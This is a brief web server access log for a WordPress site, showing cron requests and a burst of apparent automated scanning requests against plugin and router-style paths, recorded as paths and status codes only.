103.4.122.14 - - [13/Jan/2026:14:36:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768286179.8119750022888183593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
110.235.168.132 - - [13/Jan/2026:14:36:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Linux; Android 10; x64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/75.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:45:31 +0800] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:45:33 +0800] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
103.4.122.14 - - [13/Jan/2026:14:45:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768286735.7996699810028076171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:45:32 +0800] "POST /cgibin/webproc HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:14:45:42 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:45:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768286748.4760110378265380859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:45:45 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
